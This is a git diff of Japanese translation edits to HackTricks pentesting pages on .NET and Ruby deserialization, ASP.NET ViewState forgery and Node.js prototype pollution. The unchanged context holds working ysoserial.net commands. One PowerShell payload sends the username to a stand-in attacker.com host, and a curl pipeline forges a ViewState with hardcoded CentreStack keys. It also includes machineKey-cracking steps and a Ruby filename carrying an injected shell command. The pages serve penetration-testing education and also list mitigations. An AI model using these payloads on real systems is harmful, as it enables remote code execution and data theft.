 この場合、ツール[**ysoserial.net**](https://github.com/pwntester/ysoserial.net)を使用して**デシリアライズの悪用を作成**できます。gitリポジトリをダウンロードしたら、Visual Studioなどを使用して**ツールをコンパイル**する必要があります。
 
-**ysoserial.netがどのように悪用を作成するか**について学びたい場合は、[**ObjectDataProviderガジェット + ExpandedWrapper + Json.Netフォーマッターが説明されているこのページを確認してください**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)。
+**ysoserial.netがどのように悪用を作成するか**について学びたい場合は、[**ObjectDataProviderガジェット + ExpandedWrapper + Json.Netフォーマッタについて説明しているこのページを確認してください**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)。
 
 **ysoserial.net**の主なオプションは、**`--gadget`**、**`--formatter`**、**`--output`**、および**`--plugin`**です。
 
-- **`--gadget`**は、悪用するガジェットを示すために使用されます(デシリアライズ中にコマンドを実行するために悪用されるクラス/関数を示します)。
-- **`--formatter`**は、悪用をシリアライズする方法を示すために使用されます(ペイロードをデシリアライズするためにバックエンドが使用しているライブラリを知り、それを使用してシリアライズする必要があります)。
-- **`--output`**は、悪用を**生**または**base64**エンコードで出力するかどうかを示すために使用されます。_注意してください、**ysoserial.net**はペイロードを**UTF-16LE**(Windowsでデフォルトで使用されるエンコーディング)を使用して**エンコード**しますので、生のペイロードを取得してLinuxコンソールからエンコードすると、悪用が正しく機能しない**エンコーディングの互換性の問題**が発生する可能性があります(HTB JSONボックスではペイロードはUTF-16LEとASCIIの両方で機能しましたが、これは常に機能するとは限りません)。_
+- **`--gadget`**は、悪用するガジェットを指定するために使用されます(デシリアライズ中にコマンドを実行するために悪用されるクラス/関数を指定します)。
+- **`--formatter`**は、悪用をシリアライズする方法を指定するために使用されます(ペイロードをデシリアライズするためにバックエンドが使用しているライブラリを知り、それを使用してシリアライズする必要があります)。
+- **`--output`**は、悪用を**生**または**base64**エンコードされた形式で取得したいかどうかを指定するために使用されます。_注意してください、**ysoserial.net**はペイロードを**UTF-16LE**(Windowsでデフォルトで使用されるエンコーディング)を使用して**エンコード**しますので、生のペイロードを取得してLinuxコンソールからエンコードすると、悪用が正しく機能しない**エンコーディングの互換性の問題**が発生する可能性があります(HTB JSONボックスではペイロードはUTF-16LEとASCIIの両方で機能しましたが、これは常に機能するとは限りません)。_
 - **`--plugin`**ysoserial.netは、ViewStateのような**特定のフレームワーク用の悪用を作成するためのプラグイン**をサポートしています。
 
 #### 追加のysoserial.netパラメータ
 
-- `--minify`は**小さなペイロード**を提供します(可能な場合)。
-- `--raf -f Json.Net -c "anything"`これは、提供されたフォーマッター(この場合は`Json.Net`)で使用できるすべてのガジェットを示します。
-- `--sf xml`は**ガジェット**(`-g`)を示すことができ、ysoserial.netは「xml」を含むフォーマッターを検索します(大文字と小文字を区別しません)。
+- `--minify`は**小さいペイロード**を提供します(可能な場合)。
+- `--raf -f Json.Net -c "anything"`これは、提供されたフォーマッタ(この場合は`Json.Net`)で使用できるすべてのガジェットを示します。
+- `--sf xml`は**ガジェット**(`-g`)を指定でき、ysoserial.netは「xml」を含むフォーマッタを検索します(大文字と小文字を区別しない)。
 
-**ysoserialの例**を使用して悪用を作成します:
+**ysoserialの例**を使用して悪用を作成します:
 ```bash
 #Send ping
 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64
@@ -759,8 +761,8 @@ TypeNameHandling = TypeNameHandling.Auto
 return obj;
 }
 ```
-**前のコードは作成されたエクスプロイトに対して脆弱です**。したがって、.Netアプリケーションで同様のものを見つけた場合、そのアプリケーションも脆弱である可能性があります。\
-そのため、**`--test`**パラメータは、**どのコードのチャンクが**ysoserial.net**によって作成されるデシリアライズエクスプロイトに脆弱であるかを理解するのに役立ちます。**
+In the **前のコードは作成されたエクスプロイトに脆弱です**。したがって、.Netアプリケーションで同様のものを見つけた場合、そのアプリケーションも脆弱である可能性があります。\
+したがって、**`--test`**パラメータは、**どのコードのチャンクが**ysoserial.net**によって作成されるデシリアライズエクスプロイトに脆弱であるかを理解するのに役立ちます。**
 
 ### ViewState
 
@@ -770,19 +772,19 @@ return obj;
 
 .Netにおけるデシリアライズに関連するリスクを軽減するために:
 
-- **データストリームがオブジェクトタイプを定義することを許可しない。** 可能な限り`DataContractSerializer`または`XmlSerializer`を利用してください。
-- **`JSON.Net`の場合、`TypeNameHandling`を`None`に設定する:** `TypeNameHandling = TypeNameHandling.None`
-- **`JavaScriptSerializer`を`JavaScriptTypeResolver`と共に使用しない。**
-- **デシリアライズ可能なタイプを制限し、`System.IO.FileInfo`のような.Netタイプに内在するリスクを理解する。** これはサーバーファイルのプロパティを変更し、サービス拒否攻撃を引き起こす可能性があります。
-- **リスクのあるプロパティを持つタイプに注意する。** 例えば、`System.ComponentModel.DataAnnotations.ValidationException`の`Value`プロパティは悪用される可能性があります。
-- **攻撃者がデシリアライズプロセスに影響を与えないように、タイプのインスタンス化を安全に制御する。** これにより、`DataContractSerializer`や`XmlSerializer`でさえ脆弱になります。
-- **`BinaryFormatter`および`JSON.Net`のためにカスタム`SerializationBinder`を使用してホワイトリスト制御を実装する。**
-- **.Net内の既知の不安全なデシリアライズガジェットについて情報を得て、デシリアライザがそのようなタイプをインスタンス化しないようにする。**
-- **インターネットアクセスのあるコードから潜在的にリスクのあるコードを隔離し、`System.Windows.Data.ObjectDataProvider`のような既知のガジェットを信頼できないデータソースにさらさないようにする。**
+- **データストリームにオブジェクトタイプを定義させないようにします。** 可能な場合は`DataContractSerializer`または`XmlSerializer`を利用してください。
+- **`JSON.Net`の場合、`TypeNameHandling`を`None`に設定します:** `TypeNameHandling = TypeNameHandling.None`
+- **`JavaScriptSerializer`を`JavaScriptTypeResolver`と一緒に使用しないでください。**
+- **デシリアライズ可能なタイプを制限し、`System.IO.FileInfo`のような.Netタイプに内在するリスクを理解します。これはサーバーファイルのプロパティを変更し、サービス拒否攻撃を引き起こす可能性があります。**
+- **リスクのあるプロパティを持つタイプに注意してください。** 例えば、`System.ComponentModel.DataAnnotations.ValidationException`の`Value`プロパティは悪用される可能性があります。
+- **攻撃者がデシリアライズプロセスに影響を与えないように、タイプのインスタンス化を安全に制御します。これにより、`DataContractSerializer`や`XmlSerializer`でさえ脆弱になります。**
+- **`BinaryFormatter`および`JSON.Net`のためにカスタム`SerializationBinder`を使用してホワイトリスト制御を実装します。**
+- **.Net内の既知の不安全なデシリアライズガジェットについて情報を得て、デシリアライザがそのようなタイプをインスタンス化しないようにします。**
+- **インターネットアクセスのあるコードからリスクのあるコードを隔離し、WPFアプリケーションの`System.Windows.Data.ObjectDataProvider`のような既知のガジェットを信頼できないデータソースにさらさないようにします。**
 
 ### **References**
 
-- Javaと.NetのJSONデシリアライズに関する**論文:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**、** トーク: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) およびスライド: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+- Javaと.NetのJSONデシリアライズに関する**論文:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**、**トーク: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) およびスライド: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
 - [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp)
 - [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
 - [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization)
@@ -908,17 +910,17 @@ candidate_methods.length() # Final number of methods=> 3595
 
 ### Ruby _json汚染
 
-ボディにハッシュ化できない値(配列など)を送信すると、それらは`_json`という新しいキーに追加されます。しかし、攻撃者はボディに任意の値を持つ`_json`という値を設定することも可能です。例えば、バックエンドがパラメータの真偽をチェックし、その後`_json`パラメータを使用して何らかのアクションを実行する場合、認証バイパスが行われる可能性があります。
+ボディに配列のようなハッシュ化できない値を送信すると、それらは新しいキー`_json`に追加されます。しかし、攻撃者はボディに任意の値を持つ`_json`という値を設定することも可能です。例えば、バックエンドがパラメータの真偽をチェックし、その後`_json`パラメータを使用して何らかのアクションを実行する場合、認可バイパスが行われる可能性があります。
 
-[Ruby _json汚染ページで詳細情報を確認してください](ruby-_json-pollution.md)。
+[Ruby _json汚染ページで詳細を確認してください](ruby-_json-pollution.md)。
 
 ### その他のライブラリ
 
-この技術は[**このブログ記事から**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)取得されました。
+この技術は[**このブログ投稿から**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)取得されました。
 
 オブジェクトをシリアライズするために使用できる他のRubyライブラリがあり、それらは不安全なデシリアライズ中にRCEを得るために悪用される可能性があります。以下の表は、これらのライブラリのいくつかと、それがデシリアライズされる際に呼び出されるメソッドを示しています(基本的にRCEを得るために悪用する関数):
 
-
ライブラリ入力データクラス内のキックオフメソッド
Marshal (Ruby)バイナリ_load
OjJSONhash(クラスはハッシュ(マップ)にキーとして入れる必要があります)
OxXMLhash(クラスはハッシュ(マップ)にキーとして入れる必要があります)
Psych (Ruby)YAMLhash(クラスはハッシュ(マップ)にキーとして入れる必要があります)
init_with
JSON (Ruby)JSONjson_create([json_createに関するノートを参照](#table-vulnerable-sinks))

+
ライブラリ入力データクラス内のキックオフメソッド
Marshal (Ruby)バイナリ_load
OjJSONhash (クラスはハッシュ(マップ)にキーとして入れる必要があります)
OxXMLhash (クラスはハッシュ(マップ)にキーとして入れる必要があります)
Psych (Ruby)YAMLhash (クラスはハッシュ(マップ)にキーとして入れる必要があります)
init_with
JSON (Ruby)JSONjson_create ([json_createに関するノートを最後に参照](#table-vulnerable-sinks))

 
 基本的な例:
 ```ruby
@@ -942,7 +944,7 @@ puts json_payload
 # Sink vulnerable inside the code accepting user input as json_payload
 Oj.load(json_payload)
 ```
-Ojを悪用しようとした場合、`hash`関数内で`to_s`を呼び出すガジェットクラスを見つけることができました。これにより、specが呼び出され、fetch_pathが呼び出され、ランダムなURLを取得することが可能になり、これらの種類の未サニタイズのデシリアライズ脆弱性の優れた検出器を提供しました。
+Ojを悪用しようとした場合、`hash`関数内で`to_s`を呼び出すガジェットクラスを見つけることができました。これにより、specが呼び出され、fetch_pathが呼び出され、ランダムなURLを取得することが可能になり、これらの非サニタイズされたデシリアライズ脆弱性の優れた検出器を提供しました。
 ```json
 {
 "^o": "URI::HTTP",
@@ -976,21 +978,21 @@ Ojを悪用しようとした場合、`hash`関数内で`to_s`を呼び出すガ
 }
 }
 ```
-[**元の投稿**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)で詳細を確認してください。
+チェックする詳細は[**元の投稿**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)で確認してください。
 
 ### ブートストラップキャッシング
 
-実際にはデシリアライズの脆弱性ではありませんが、ブートストラップキャッシングを悪用してRailsアプリケーションから任意のファイル書き込みによるRCEを取得するための良いトリックです(完全な[元の投稿はこちら](https://blog.convisoappsec.com/en/from-arbitrary-file-write-to-rce-in-restricted-rails-apps/)を見つけてください)。
+実際にはデシリアライズの脆弱性ではありませんが、ブートストラップキャッシングを悪用してRailsアプリケーションから任意のファイル書き込みによるRCEを取得するための良いトリックです(完全な[元の投稿はこちら](https://blog.convisoappsec.com/en/from-arbitrary-file-write-to-rce-in-restricted-rails-apps/)で見つけてください)。
 
-以下は、Bootsnapキャッシングを悪用して任意のファイル書き込み脆弱性を悪用するための記事で詳述された手順の短い要約です:
+以下は、Bootsnapキャッシングを悪用して任意のファイル書き込み脆弱性を悪用するために記事で詳述された手順の短い要約です:
 
 - 脆弱性と環境の特定
 
-Railsアプリのファイルアップロード機能は、攻撃者が任意にファイルを書き込むことを許可します。アプリは制限付きで実行されます(Dockerの非ルートユーザーのため、tmpのような特定のディレクトリのみが書き込み可能)が、これによりBootsnapキャッシュディレクトリ(通常はtmp/cache/bootsnapの下)への書き込みが可能になります。
+Railsアプリのファイルアップロード機能は、攻撃者が任意にファイルを書き込むことを許可します。アプリは制限付きで実行されます(Dockerの非rootユーザーのため、tmpのような特定のディレクトリのみが書き込み可能)が、これによりBootsnapキャッシュディレクトリ(通常はtmp/cache/bootsnapの下)への書き込みが可能になります。
 
 - Bootsnapのキャッシュメカニズムの理解
 
-Bootsnapは、コンパイルされたRubyコード、YAML、およびJSONファイルをキャッシュすることでRailsの起動時間を短縮します。キャッシュファイルにはキャッシュキーヘッダー(Rubyバージョン、ファイルサイズ、mtime、コンパイルオプションなどのフィールドを含む)が含まれ、その後にコンパイルされたコードが続きます。このヘッダーはアプリの起動時にキャッシュを検証するために使用されます。
+Bootsnapは、コンパイルされたRubyコード、YAML、およびJSONファイルをキャッシュすることでRailsの起動時間を短縮します。キャッシュファイルにはキャッシュキーのヘッダー(Rubyバージョン、ファイルサイズ、mtime、コンパイルオプションなどのフィールドを含む)が含まれ、その後にコンパイルされたコードが続きます。このヘッダーはアプリの起動時にキャッシュを検証するために使用されます。
 
 - ファイルメタデータの収集
 
@@ -1037,14 +1039,14 @@ end
 *-TmTT="$(id>/tmp/marshal-poc)"any.zip
 ```
 実際のアプリでの出現場所:
-- 歴史的に Marshal を使用している Rails キャッシュストアとセッションストア
+- Railsキャッシュストアとセッションストアは、歴史的にMarshalを使用
 - バックグラウンドジョブバックエンドとファイルバックオブジェクトストア
 - バイナリオブジェクトブロブのカスタム永続化または輸送
 
 産業化されたガジェット発見:
-- コンストラクタ、`hash`、`_load`、`init_with`、またはアンマーシャル中に呼び出される副作用のあるメソッドを grep
-- CodeQL の Ruby 不安全なデシリアライズクエリを使用してソース → シンクを追跡し、ガジェットを明らかにする
-- 公開されたマルチフォーマット PoC (JSON/XML/YAML/Marshal) で検証
+- コンストラクタ、`hash`、`_load`、`init_with`、またはアンマーシャル中に呼び出される副作用のあるメソッドをgrep
+- CodeQLのRubyの安全でないデシリアライズクエリを使用してソース→シンクを追跡し、ガジェットを明らかにする
+- 公開されたマルチフォーマットのPoC(JSON/XML/YAML/Marshal)で検証
 
 ## 参考文献
 
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 5c8799c1b..38c1514f2 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -19,7 +19,7 @@ ViewState情報は、以下の特性またはその組み合わせによって
 
 ## テストケース
 
-画像は、.NETフレームワークのバージョンに基づくASP.NETにおけるViewStateの異なる構成を詳細に示した表です。内容の概要は以下の通りです:
+画像は、.NETフレームワークのバージョンに基づくASP.NETのViewStateの異なる構成を詳細に示した表です。内容の概要は以下の通りです:
 
 1. **任意の.NETバージョン**において、MACと暗号化の両方が無効な場合、MachineKeyは必要なく、したがってそれを特定する適用可能な方法はありません。
 2. **4.5未満のバージョン**では、MACが有効で暗号化が無効な場合、MachineKeyが必要です。MachineKeyを特定する方法は「Blacklist3r」と呼ばれます。
@@ -38,19 +38,19 @@ BurpSuiteを使用して、このパラメータを含むリクエストをキ
 ```
 ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
 ```
-### Test case 1.5 – Test case 1と同様ですが、ViewStateクッキーはサーバーによって送信されません
+### Test case 1.5 – Like Test case 1 but the ViewState cookie isn't sent by the server
 
-開発者は**ViewState**をHTTPリクエストの一部として送信されないように**削除**することができます(ユーザーはこのクッキーを受け取りません)。\
-**ViewState**が**存在しない**場合、その実装はViewStateのデシリアライズに起因する潜在的な脆弱性から**安全**であると考えるかもしれません。\
+開発者は**ViewState**をHTTPリクエストの一部として送信しないように**削除**することができます(ユーザーはこのクッキーを受け取りません)。\
+**ViewState**が**存在しない**場合、その実装は**ViewStateのデシリアライズに起因する潜在的な脆弱性**から**安全**であると仮定するかもしれません。\
 しかし、それは事実ではありません。リクエストボディに**ViewStateパラメータ**を追加し、ysoserialを使用して作成したシリアライズされたペイロードを送信すれば、**ケース1**に示されているように**コード実行**を達成することができます。
 
-### Test Case: 2 – .Net < 4.5 および EnableViewStateMac=true & ViewStateEncryptionMode=false
+### Test Case: 2 – .Net < 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false
 
 特定のページに**ViewState MAC**を**有効**にするためには、特定のaspxファイルに以下の変更を加える必要があります:
 ```bash
 <%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
 ```
-全体のアプリケーションに対しても、以下に示すように**web.config**ファイルに設定することができます:
+全体のアプリケーションに対しても、以下に示すように**web.config**ファイルに設定することで実行できます:
 ```xml
 
 
@@ -63,16 +63,16 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
 ```
 パラメータはMACで保護されているため、攻撃を成功させるにはまず使用されているキーが必要です。
 
-使用されているキーを見つけるために[**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)を試すことができます。
+[**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)を使用して、使用されているキーを見つけることができます。
 ```
 AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
 
 --encrypteddata : __VIEWSTATE parameter value of the target application
 --modifier : __VIWESTATEGENERATOR parameter value
 ```
-[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) は、既知の machineKeys を特定できる別のツールです。これは Python で書かれているため、Blacklist3r とは異なり、Windows 依存性はありません。.NET viewstates 用には、「python blacklist3r」ユーティリティがあり、これが最も迅速な使用方法です。
+[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) は、既知の machineKeys を特定できる別のツールです。Python で書かれているため、Blacklist3r とは異なり、Windows 依存性はありません。.NET viewstates 用に、「python blacklist3r」ユーティリティがあり、これが最も迅速な使用方法です。
 
-viewstate と generator を直接提供することもできます:
+viewstate と generator を直接供給することができます:
 ```
 pip install badsecrets
 git clone https://github.com/blacklanternsecurity/badsecrets
@@ -81,7 +81,7 @@ python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgX
 ```
 ![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)
 
-または、ターゲットURLに直接接続し、HTMLからviewstateを切り出そうとすることもできます:
+または、ターゲットURLに直接接続し、HTMLからviewstateを切り出そうとすることもできます:
 ```
 pip install badsecrets
 git clone https://github.com/blacklanternsecurity/badsecrets
@@ -90,7 +90,7 @@ python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
 ```
 ![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)
 
-脆弱な viewstate を大規模に検索するために、サブドメイン列挙と組み合わせて、`badsecrets` [**BBOT**](exploiting-__viewstate-parameter.md) モジュールを使用できます:
+脆弱なviewstateを大規模に検索するために、サブドメイン列挙と組み合わせて、`badsecrets` [**BBOT**](exploiting-__viewstate-parameter.md) モジュールを使用できます:
 ```
 bbot -f subdomain-enum -m badsecrets -t evil.corp
 ```
@@ -102,7 +102,7 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Inv
 
 --generator = {__VIWESTATEGENERATOR parameter value}
 ```
-サーバーによって`_VIEWSTATEGENERATOR`パラメータが**送信されない**場合、`--generator`パラメータを**提供する必要はありませんが、これらのパラメータは必要です**:
+サーバーによって `_VIEWSTATEGENERATOR` パラメータが **送信されない** 場合、`--generator` パラメータを **提供する必要はありませんが、これらのパラメータは必要です**:
 ```bash
 --apppath="/" --path="/hello.aspx"
 ```
@@ -138,7 +138,7 @@ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47Lw
 --IISDirPath = {Directory path of website in IIS}
 --TargetPagePath = {Target page path in application}
 ```
-IISDirPathとTargetPagePathの詳細な説明については、[こちらを参照してください](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)。
+IISDirPathとTargetPagePathの詳細な説明については、[こちらを参照してください](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 
 または、[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets)(ジェネレーター値付き)を使用して:
 ```bash
@@ -166,9 +166,9 @@ ViewStateのデシリアライズ脆弱性の成功した悪用は、攻撃者
 ```
 ### 成功したエクスプロイトの結果 
 
-すべてのテストケースにおいて、ViewState YSoSerial.Net ペイロードが**成功**した場合、サーバーは“**500 Internal server error**”という応答を返し、応答内容は“**このページの状態情報は無効であり、破損している可能性があります**”となり、OOB リクエストを取得します。
+すべてのテストケースにおいて、ViewState YSoSerial.Net ペイロードが**成功**した場合、サーバーは「**500 Internal server error**」で応答し、応答内容は「**このページの状態情報は無効であり、破損している可能性があります**」となり、OOB リクエストを取得します。
 
-[さらなる情報はこちらを確認してください]()
+[こちらでさらなる情報を確認してください]()
 
 ### リフレクションを介したASP.NETマシンキーのダンプ (SharPyShell/SharePoint ToolShell)
 
@@ -204,14 +204,14 @@ curl "http://victim/page.aspx?__VIEWSTATE="
 ## 2024-2025年の実世界の悪用シナリオとハードコーディングされたマシンキー
 
 ### Microsoftの「公開されたマシンキー」波(2024年12月 – 2025年2月)
-Microsoft Threat Intelligenceは、*machineKey*が以前に公的なソース(GitHub gists、ブログ投稿、ペーストサイト)で漏洩していたASP.NETサイトの大規模な悪用を報告しました。敵対者はこれらのキーを列挙し、WAFの長さ制限を回避するために新しい`ysoserial.net` 1.41の`--minify`および`--islegacy`フラグを使用して有効な`__VIEWSTATE`ガジェットを生成しました:
+Microsoft Threat Intelligenceは、*machineKey*が以前に公的なソース(GitHub gists、ブログ投稿、ペーストサイト)で漏洩していたASP.NETサイトの大規模な悪用を報告しました。敵対者はこれらのキーを列挙し、WAFの長さ制限を回避するために新しい`ysoserial.net` 1.41の`--minify`および`--islegacy`フラグを使用して有効な`__VIEWSTATE`ガジェットを生成しました。
 ```bash
 ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \
 --validationkey= --validationalg=SHA1 \
 --decryptionkey= --decryptionalg=AES \
 --generator= --minify
 ```
-静的キーを回転させるか、Web .configで*AutoGenerate*キーに切り替えることで(``)、この種の攻撃を軽減できます。
+静的キーを回転させるか、Web .configで*AutoGenerate*キーに切り替えること(``)は、この種の攻撃を軽減します。
 
 ### CVE-2025-30406 – Gladinet CentreStack / Triofoxのハードコーディングされたキー
 Kudelski Securityは、複数のCentreStack / Triofoxリリースが同一の`machineKey`値で出荷されており、ViewStateの偽造を通じて認証されていないリモートコード実行を可能にしていることを発見しました(CVE-2025-30406)。
@@ -225,10 +225,7 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
 --decryptionalg=AES --generator=24D41AAB --minify \
 | curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx
 ```
-CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 で修正されました – すぐにアップグレードまたはキーを置き換えてください。 {{#ref}}
-
-
-{{#endref}}
+CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 で修正されました – すぐにアップグレードまたはキーを置き換えてください。
 
 ## 参考文献
 
@@ -245,6 +242,4 @@ CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 で修正されました
 - [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
 - [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/)
 
-
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
index 5e72a74cb..9c365680b 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
@@ -33,7 +33,7 @@ employee1.__proto__
 ```
 ### JavaScriptにおけるプロトタイプ
 
-JavaScriptは、ランタイムでプロトタイプ属性の修正、追加、または削除を許可します。この柔軟性により、クラス機能の動的拡張が可能になります。
+JavaScriptは、ランタイムでプロトタイプ属性の変更、追加、または削除を許可します。この柔軟性により、クラス機能の動的拡張が可能になります。
 
 `toString`や`valueOf`のような関数は、その動作を変更するために変更可能であり、JavaScriptのプロトタイプシステムの適応性を示しています。
 
@@ -78,7 +78,7 @@ console.log(car1.isVehicle) // Outputs true
 ```
 ## プロトタイプ汚染
 
-`__proto__` の使用が制限されているシナリオでは、関数のプロトタイプを変更することが代替手段です:
+`__proto__` の使用が制限されているシナリオでは、関数のプロトタイプを変更することが代替手段です:
 ```javascript
 function Vehicle(model) {
 this.model = model
@@ -121,7 +121,7 @@ console.log("Hello!")
 
 ### クラスからObject.prototypeへ
 
-特定のオブジェクトを**汚染**でき、**`Object.prototype`に到達する**必要があるシナリオでは、次のようなコードでそれを検索できます:
+特定のオブジェクトを**汚染**でき、**`Object.prototype`に到達する**必要があるシナリオでは、次のようなコードでそれを検索できます:
 ```javascript
 // From https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/
 
@@ -173,11 +173,11 @@ settings[root][ownerDocument][body][innerHTML]="{alert("polluted")}
 ```
 ### Proto Pollution to RCE
 
+
 {{#ref}}
 prototype-pollution-to-rce.md
 {{#endref}}
@@ -207,20 +208,21 @@ prototype-pollution-to-rce.md
 
 ## クライアントサイドのプロトタイプ汚染からXSSへ
 
+
 {{#ref}}
 client-side-prototype-pollution.md
 {{#endref}}
 
 ### CVE-2019–11358: jQuery $ .extendを通じたプロトタイプ汚染攻撃
 
-[詳細についてはこの記事を確認してください](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7) jQueryでは、`$ .extend`関数が深いコピー機能を不適切に利用するとプロトタイプ汚染を引き起こす可能性があります。この関数は、オブジェクトのクローンやデフォルトオブジェクトからのプロパティのマージによく使用されます。しかし、誤って設定されると、新しいオブジェクト用のプロパティがプロトタイプに割り当てられることがあります。例えば:
+[詳細についてはこの記事を確認してください](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7) jQueryでは、`$ .extend`関数が深いコピー機能を不適切に利用するとプロトタイプ汚染を引き起こす可能性があります。この関数は、オブジェクトのクローンやデフォルトオブジェクトからのプロパティのマージに一般的に使用されます。しかし、誤って設定された場合、新しいオブジェクト用のプロパティがプロトタイプに割り当てられることがあります。例えば:
 ```javascript
 $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}'))
 console.log({}.devMode) // Outputs: true
 ```
-この脆弱性はCVE-2019–11358として特定されており、ディープコピーがプロトタイプを意図せず変更することで、`isAdmin`のようなプロパティが適切な存在確認なしにチェックされると、未承認の管理者アクセスなどの潜在的なセキュリティリスクを引き起こす可能性があることを示しています。
+この脆弱性はCVE-2019–11358として特定されており、ディープコピーがプロトタイプを意図せず変更する可能性があることを示しています。これにより、`isAdmin`のようなプロパティが適切な存在確認なしにチェックされると、未承認の管理者アクセスなどの潜在的なセキュリティリスクが生じる可能性があります。
 
-### CVE-2018–3721, CVE-2019–10744: lodashによるプロトタイプ汚染攻撃
+### CVE-2018–3721、CVE-2019–10744: lodashによるプロトタイプ汚染攻撃
 
 [詳細についてはこの記事を確認してください](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7)
 
@@ -234,7 +236,7 @@ console.log({}.devMode) // Outputs: true
 
